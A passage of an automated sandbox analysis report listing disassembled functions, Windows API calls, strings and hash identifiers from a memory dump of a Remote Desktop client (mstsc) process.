                                                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 009102EC
                                                                                                                                                                                        • CreateDialogIndirectParamW.USER32(?,00000000,?,00931E40,?), ref: 0091032A
                                                                                                                                                                                        • ShowWindow.USER32(00000000,00000005), ref: 00910336
                                                                                                                                                                                        • GetDlgItem.USER32(?,0000335E), ref: 00910344
                                                                                                                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000003), ref: 00910356
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                          • Part of subcall function 008E10B1: TraceMessage.ADVAPI32(00000000,008E396B,0000002B,008D7B50,0000000D,00913C39,00000004,00000000,?,00913C39,008E396B,00000000,00000000), ref: 008E10C8
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ItemWindow$MessageRectText$??2@AddressCreateDialogFreeHandleIndirectInvalidateLibraryModuleParamProcSendShowTrace
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2286261651-0
                                                                                                                                                                                        • Opcode ID: c6e456532dade4f5bff8805df869a23ac18557529101535ca539479f078c40c1
                                                                                                                                                                                        • Instruction ID: f853cd51e5e1610d1e3f098bd05380e3268198ea6900e6becbd7fc2925e646fe
                                                                                                                                                                                        • Opcode Fuzzy Hash: c6e456532dade4f5bff8805df869a23ac18557529101535ca539479f078c40c1
                                                                                                                                                                                        • Instruction Fuzzy Hash: B851CD71604204EFCF119FA5DD8EE6A7F6AEF89700B148069F905AB266CB71DC90DF60
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 008E6B91
                                                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 008E6B9C
                                                                                                                                                                                        • CopyRect.USER32(?,?), ref: 008E6BAE
                                                                                                                                                                                          • Part of subcall function 008E10B1: TraceMessage.ADVAPI32(00000000,008E396B,0000002B,008D7B50,0000000D,00913C39,00000004,00000000,?,00913C39,008E396B,00000000,00000000), ref: 008E10C8
                                                                                                                                                                                        • SetRect.USER32 ref: 008E6BC2
                                                                                                                                                                                        • InitCommonControlsEx.COMCTL32(?,00000001), ref: 008E6C2C
                                                                                                                                                                                        • DestroyWindow.USER32 ref: 008E7015
                                                                                                                                                                                        Strings
                                                                                                                                                                                        • Failed RegisterPopupParentWindowClass(TRUE), xrefs: 008E6BFB
                                                                                                                                                                                        • QI for IID_IMsRdpClient9 failed!, xrefs: 008E6E2D
                                                                                                                                                                                        • HandleContainerWndDisplayChange, xrefs: 008E6E62
                                                                                                                                                                                        • DynamicDeviceTestEnabled, xrefs: 008E6EFE
                                                                                                                                                                                        • EnterMoveSizeLoop, xrefs: 008E6E69
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: RectWindow$CommonControlsCopyDesktopDestroyInitMessageTrace
                                                                                                                                                                                        • String ID: DynamicDeviceTestEnabled$EnterMoveSizeLoop$Failed RegisterPopupParentWindowClass(TRUE)$HandleContainerWndDisplayChange$QI for IID_IMsRdpClient9 failed!
                                                                                                                                                                                        • API String ID: 2476843831-3953550343
                                                                                                                                                                                        • Opcode ID: 085942939d8b17d60e82cdfb8cbbcd5da0765fc0d796188be3252d59085ddeb8
                                                                                                                                                                                        • Instruction ID: 2f97782782ac7d75e040eb545f525964587df9309a7d35c372321600de48391e
                                                                                                                                                                                        • Opcode Fuzzy Hash: 085942939d8b17d60e82cdfb8cbbcd5da0765fc0d796188be3252d59085ddeb8
                                                                                                                                                                                        • Instruction Fuzzy Hash: 3FE1DF31604385AFDB18CF6AD889F697BA6FB1A354F140058F501DB2A2DB71ECA0CF52
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • ??_U@YAPAXI@Z.MSVCRT(00000400,750A375A,?,?), ref: 009072FA
                                                                                                                                                                                        • GetLastError.KERNEL32(00000000,00000200), ref: 00907396
                                                                                                                                                                                        • ??_V@YAXPAX@Z.MSVCRT(?,?,008D6D74), ref: 0090763C
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                          • Part of subcall function 008DF9DC: TraceMessage.ADVAPI32(?,00000000,0000002B,008D1728,00000010,00000000,00000004,?,00000005,00000000,00000001,00000000,00000000,?,008DFBF2,008E396B), ref: 008DFA1C
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AddressErrorFreeHandleLastLibraryMessageModuleProcTrace
                                                                                                                                                                                        • String ID: TCHAR
                                                                                                                                                                                        • API String ID: 3225508460-2426338081
                                                                                                                                                                                        • Opcode ID: 214a3a187418d669228e6d64a3f6f0b3611b04489e00839a0bbaada9d8a0200a
                                                                                                                                                                                        • Instruction ID: df894e314bb7edf6decce524e26d1e075e82ebbd20d583da0d97fef823da77f2
                                                                                                                                                                                        • Opcode Fuzzy Hash: 214a3a187418d669228e6d64a3f6f0b3611b04489e00839a0bbaada9d8a0200a
                                                                                                                                                                                        • Instruction Fuzzy Hash: F291D271E087486FDB299F98DC49F99BBAAAB09320F100094F541E72F2C675ED90DF52
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • LoadLibraryW.KERNEL32(kernel32.dll,00000000,00000000,00000000), ref: 009159A8
                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 009159B5
                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00915A1D
                                                                                                                                                                                        • GetProcAddress.KERNEL32(00915C84,Wow64RevertWow64FsRedirection), ref: 00915A2C
                                                                                                                                                                                        • memset.MSVCRT ref: 00915A4A
                                                                                                                                                                                        • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000001,00000010,00000000,00000000,?,?), ref: 00915A84
                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00915A93
                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00915AE9
                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00915AEE
                                                                                                                                                                                        • FreeLibrary.KERNEL32(00915C84), ref: 00915BA3
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                        Strings
                                                                                                                                                                                        • kernel32.dll, xrefs: 0091599B
                                                                                                                                                                                        • Wow64RevertWow64FsRedirection, xrefs: 00915A1F
                                                                                                                                                                                        • Wow64DisableWow64FsRedirection, xrefs: 00915A17
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AddressHandleLibraryProc$CloseErrorFreeLast$CreateLoadModuleProcessmemset
                                                                                                                                                                                        • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                                                        • API String ID: 3803272689-4169039593
                                                                                                                                                                                        • Opcode ID: 29c3576aff20e5131e3b204a41a0bc6d54b55b51b5bce9bba7f61dcf9bcffa32
                                                                                                                                                                                        • Instruction ID: 09a44549e1caad3bc838ce51ff381d3aa31c4b853386dfd48fca46cf19f1517f
                                                                                                                                                                                        • Opcode Fuzzy Hash: 29c3576aff20e5131e3b204a41a0bc6d54b55b51b5bce9bba7f61dcf9bcffa32
                                                                                                                                                                                        • Instruction Fuzzy Hash: FA510571698708EFDB299FA58D89F9A3BA9FF89300F160055F500E7262D775CC80AF52
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetDlgItem.USER32(?,00003313), ref: 00907895
                                                                                                                                                                                        • SendMessageW.USER32(00000000), ref: 0090789C
                                                                                                                                                                                        • IsDlgButtonChecked.USER32(?,000033A6), ref: 009078B6
                                                                                                                                                                                        • IsDlgButtonChecked.USER32(?,00003316), ref: 009078D7
                                                                                                                                                                                          • Part of subcall function 00931C30: GetDlgItem.USER32(?,0093A070), ref: 00931C4E
                                                                                                                                                                                          • Part of subcall function 00931C30: EnableWindow.USER32(00000000), ref: 00931C55
                                                                                                                                                                                        • SetWindowPos.USER32(?,00000000,?,00000110,?,00000110,00000000), ref: 00907BA2
                                                                                                                                                                                        • GetDlgItem.USER32(?,0000331B), ref: 00907BC4
                                                                                                                                                                                        • EnableWindow.USER32(00000000), ref: 00907BCB
                                                                                                                                                                                        • CheckDlgButton.USER32(?,000033A6,00000000), ref: 00907C0B
                                                                                                                                                                                        • CheckDlgButton.USER32(?,00003316,00000000), ref: 00907C52
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Button$ItemWindow$CheckCheckedEnable$MessageSend
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2189916300-0
                                                                                                                                                                                        • Opcode ID: e9e57199cc54f4613cf909913002ec826f46e1809cb8c6bedf2b1bccf7382840
                                                                                                                                                                                        • Instruction ID: 9d2183721da36db0b75c43e4cf168eda8a728482b76133a7aa5c4a6e4cf73297
                                                                                                                                                                                        • Opcode Fuzzy Hash: e9e57199cc54f4613cf909913002ec826f46e1809cb8c6bedf2b1bccf7382840
                                                                                                                                                                                        • Instruction Fuzzy Hash: 6EC1BA71618341AFD719DFA8C889E2AB7A9FF49310F044568F541D72A2CB34EE50DF92
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetClientRect.USER32(?,?,?,00000000,?), ref: 0092E3E1
                                                                                                                                                                                        • GetLastError.KERNEL32(?,00000000,?), ref: 0092E3EB
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                          • Part of subcall function 008E2C68: TraceMessage.ADVAPI32(00000000,00000000,0000002B,008D7B50,0000000B,008E396B,00000004,00913BC2,00000004,00000000,?,00913BC2,008E396B,00000000,00000000,00000000), ref: 008E2C85
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AddressClientErrorFreeHandleLastLibraryMessageModuleProcRectTrace
                                                                                                                                                                                        • String ID: (
                                                                                                                                                                                        • API String ID: 3483488408-3887548279
                                                                                                                                                                                        • Opcode ID: 656d41c21bf59f68ab59bb13022ffff467036306acfaf1124817dc788edb67e4
                                                                                                                                                                                        • Instruction ID: 7a9721a6c022f7dbda1b2c1479e03f2ed26b5a1282d514439b998000807571f3
                                                                                                                                                                                        • Opcode Fuzzy Hash: 656d41c21bf59f68ab59bb13022ffff467036306acfaf1124817dc788edb67e4
                                                                                                                                                                                        • Instruction Fuzzy Hash: FCA19D72518350AFD729CF68E989F2A7BEABB89310F08095DF98097265C630DC44CF92
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetLastError.KERNEL32(00000000,00000000,00000038), ref: 008F1BDC
                                                                                                                                                                                        • LoadCursorW.USER32 ref: 008F1C06
                                                                                                                                                                                        • GetStockObject.GDI32(00000005), ref: 008F1C11
                                                                                                                                                                                        • RegisterClassExW.USER32(00000030), ref: 008F1C2D
                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 008F1C3A
                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 008F1C67
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                          • Part of subcall function 008E2C68: TraceMessage.ADVAPI32(00000000,00000000,0000002B,008D7B50,0000000B,008E396B,00000004,00913BC2,00000004,00000000,?,00913BC2,008E396B,00000000,00000000,00000000), ref: 008E2C85
                                                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 008F1C94
                                                                                                                                                                                        • CreateWindowExW.USER32 ref: 008F1CBE
                                                                                                                                                                                        • SetWindowLongW.USER32(00000000,000000EB,?), ref: 008F1CCF
                                                                                                                                                                                        • ShowWindow.USER32(?,00000001), ref: 008F1D01
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ErrorLastWindow$AddressClassClientCreateCursorFreeHandleLibraryLoadLongMessageModuleObjectProcRectRegisterShowStockTrace
                                                                                                                                                                                        • String ID: 0$TscShellAxHostClass
                                                                                                                                                                                        • API String ID: 4201582936-2575422651
                                                                                                                                                                                        • Opcode ID: b0cb84fc53bd38ab2b542b8b9603ce0a8ca678b3c0bbfaa67c80f74b8c02d2a9
                                                                                                                                                                                        • Instruction ID: 689e811b7cbc8fcc1911f52b3203da022d22a773834753ec35b50f87292027ca
                                                                                                                                                                                        • Opcode Fuzzy Hash: b0cb84fc53bd38ab2b542b8b9603ce0a8ca678b3c0bbfaa67c80f74b8c02d2a9
                                                                                                                                                                                        • Instruction Fuzzy Hash: 05512771914348AFCB24DFA5D889FABBBB9FB49310F104559F506EA261C731D841DF21
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • LoadCursorW.USER32 ref: 0090A9E9
                                                                                                                                                                                        • RegisterClassExW.USER32(00000030), ref: 0090AA06
                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0090AA19
                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0090AA46
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                          • Part of subcall function 008E2C68: TraceMessage.ADVAPI32(00000000,00000000,0000002B,008D7B50,0000000B,008E396B,00000004,00913BC2,00000004,00000000,?,00913BC2,008E396B,00000000,00000000,00000000), ref: 008E2C85
                                                                                                                                                                                        • CreateWindowExW.USER32 ref: 0090AA93
                                                                                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 0090AAA2
                                                                                                                                                                                        • SetWindowLongW.USER32(?,000000EB,00000000), ref: 0090AAAE
                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0090AAB8
                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0090AAD6
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ErrorLast$Window$AddressClassCreateCursorFreeHandleLibraryLoadLongMessageModuleProcRegisterTrace
                                                                                                                                                                                        • String ID: 0$TscShellContainerClass
                                                                                                                                                                                        • API String ID: 661181555-978173974
                                                                                                                                                                                        • Opcode ID: 48ca93c90a5238ca2daf00da5180bdd4a8e6353b51b335312e7d283fd6424abf
                                                                                                                                                                                        • Instruction ID: 5ba979010425beffb5c8443707476773681d736bce43e3ab08e5b4d9095da136
                                                                                                                                                                                        • Opcode Fuzzy Hash: 48ca93c90a5238ca2daf00da5180bdd4a8e6353b51b335312e7d283fd6424abf
                                                                                                                                                                                        • Instruction Fuzzy Hash: 0D419F72514344AFDB289FA9DD89F6BBBAAEF44300F00410AF501D62A1D774DC40DFA2
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,?,?,0093AFA8,?), ref: 009379A5
                                                                                                                                                                                        • SearchPathW.KERNEL32 ref: 009379D8
                                                                                                                                                                                        • FindResourceExW.KERNEL32(00000000,MUI,00000001,00000000), ref: 00937A16
                                                                                                                                                                                        • GetUserDefaultUILanguage.KERNEL32 ref: 00937A31
                                                                                                                                                                                        • GetSystemDefaultUILanguage.KERNEL32(?,00000000,?,00000000,?,?), ref: 00937AFC
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: DefaultLanguage$FindLibraryLoadPathResourceSearchSystemUser
                                                                                                                                                                                        • String ID: %s\%s$MUI
                                                                                                                                                                                        • API String ID: 1597595625-2651373239
                                                                                                                                                                                        • Opcode ID: d13401189ad50c347aa1400f9fba91d1cf12b3b16901b06499463c1d9a5b8eb6
                                                                                                                                                                                        • Instruction ID: d84ccde04bf4944351ccc0a4a1a2f4e5e5782b6fcc84fd641909d4da48ecf5a5
                                                                                                                                                                                        • Opcode Fuzzy Hash: d13401189ad50c347aa1400f9fba91d1cf12b3b16901b06499463c1d9a5b8eb6
                                                                                                                                                                                        • Instruction Fuzzy Hash: C2B196F1A046699BCF319BA48C55BEBF2BE9FC4300F0045E5E959A7291DE30CE858F91
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • DefWindowProcW.USER32(?,?,00000081,?,?,?,00000000,00000000,?,0092D97E,00000081,?,?), ref: 0092DC34
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Proc$AddressFreeHandleLibraryModuleWindow
                                                                                                                                                                                        • String ID: ForwardMessageToControl failed$OnActivateApp failed$OnCancel failed$OnClose failed$OnConnectFailed failed$OnEraseBkgnd failed$OnMouseActivate failed$OnPaint failed$OnSize failed$OnStartViewer failed
                                                                                                                                                                                        • API String ID: 2574719336-1852076887
                                                                                                                                                                                        • Opcode ID: 186cfda26efed41a4bc9b4a92dafc9c5ceab95c4f392dc6dfecc3433912d6585
                                                                                                                                                                                        • Instruction ID: 2635c51874b6d3d6be1cc215edfe3c886829c2e7465ca7e05d4a78e39bd2ee14
                                                                                                                                                                                        • Opcode Fuzzy Hash: 186cfda26efed41a4bc9b4a92dafc9c5ceab95c4f392dc6dfecc3433912d6585
                                                                                                                                                                                        • Instruction Fuzzy Hash: A09102751067A06EDB2F8F54EE88F353B9ABB06354F184448F980C64EAC675CE02DF92
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • memset.MSVCRT ref: 009308CE
                                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00930A52
                                                                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?), ref: 00930A62
                                                                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?), ref: 00930A68
                                                                                                                                                                                        • CredDeleteW.ADVAPI32(?,00000002,00000000), ref: 00930A7B
                                                                                                                                                                                        • SHStrDupW.SHLWAPI(?,?), ref: 00930ACC
                                                                                                                                                                                        • CredWriteW.ADVAPI32(?,00000000), ref: 00930B4C
                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00930B5A
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                          • Part of subcall function 008E2C68: TraceMessage.ADVAPI32(00000000,00000000,0000002B,008D7B50,0000000B,008E396B,00000004,00913BC2,00000004,00000000,?,00913BC2,008E396B,00000000,00000000,00000000), ref: 008E2C85
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ??3@CredFree$AddressDeleteErrorHandleLastLibraryLocalMessageModuleProcTraceWritememset
                                                                                                                                                                                        • String ID: SHStrDup failed$s_DeleteCredHelper failed$s_UnpackAuthBlob failed
                                                                                                                                                                                        • API String ID: 641574173-1857523022
                                                                                                                                                                                        • Opcode ID: be311390f22f4d537ac8d1a45085b3e71545be30ba2c72236d99cb03c06699d7
                                                                                                                                                                                        • Instruction ID: c0a9512027e70a4a213058695c7e18809d7c372a4a6022acf5ab8bbae17d77be
                                                                                                                                                                                        • Opcode Fuzzy Hash: be311390f22f4d537ac8d1a45085b3e71545be30ba2c72236d99cb03c06699d7
                                                                                                                                                                                        • Instruction Fuzzy Hash: 0B91EF32510348AFDB29CF99E999F5A3BAAFB89310F154089F544EB2A2C734CC44DF52
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • LoadLibraryW.KERNEL32(kernel32.dll,?,00000000,00000000), ref: 00935C9B
                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00935CC6
                                                                                                                                                                                        • GetLastError.KERNEL32(008E396B,00000000,00000000,00000000), ref: 00935CF5
                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetCurrentPackageFamilyName), ref: 00935D02
                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00935D2C
                                                                                                                                                                                        • GetLastError.KERNEL32(008E396B,00000000,00000000,00000000), ref: 00935D4F
                                                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 00935E1F
                                                                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(00000000,008E396B,00000000,00000000), ref: 00935EEF
                                                                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00935EF9
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ErrorLast$Library$??2@??3@AddressFreeLoadProc
                                                                                                                                                                                        • String ID: GetCurrentPackageFamilyName$kernel32.dll
                                                                                                                                                                                        • API String ID: 1625212921-3608959999
                                                                                                                                                                                        • Opcode ID: 67982085e24fe9476221550676ae6554f23a28ae9ba2c74d5cd82bf099bc35ca
                                                                                                                                                                                        • Instruction ID: cc394689d643c080237ff263456e226f6a2fc40cf8130a44bad26bce9b8b7078
                                                                                                                                                                                        • Opcode Fuzzy Hash: 67982085e24fe9476221550676ae6554f23a28ae9ba2c74d5cd82bf099bc35ca
                                                                                                                                                                                        • Instruction Fuzzy Hash: E261C071114740ABDB3D9F69D989F263BAAEB4D314F260049E941DB2B2CB74CE809F52
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • LoadLibraryW.KERNEL32(userenv.dll,?,00000000,00000000,0091C5A2), ref: 0091C1CD
                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0091C1FC
                                                                                                                                                                                        • GetLastError.KERNEL32(008E396B,00000000,00000000,00000000), ref: 0091C228
                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetAppContainerRegistryLocation), ref: 0091C244
                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0091C271
                                                                                                                                                                                        • GetLastError.KERNEL32(008E396B,00000000,00000000,00000000), ref: 0091C29D
                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0091C2BA
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                          • Part of subcall function 008DF9DC: TraceMessage.ADVAPI32(?,00000000,0000002B,008D1728,00000010,00000000,00000004,?,00000005,00000000,00000001,00000000,00000000,?,008DFBF2,008E396B), ref: 008DFA1C
                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 0091C310
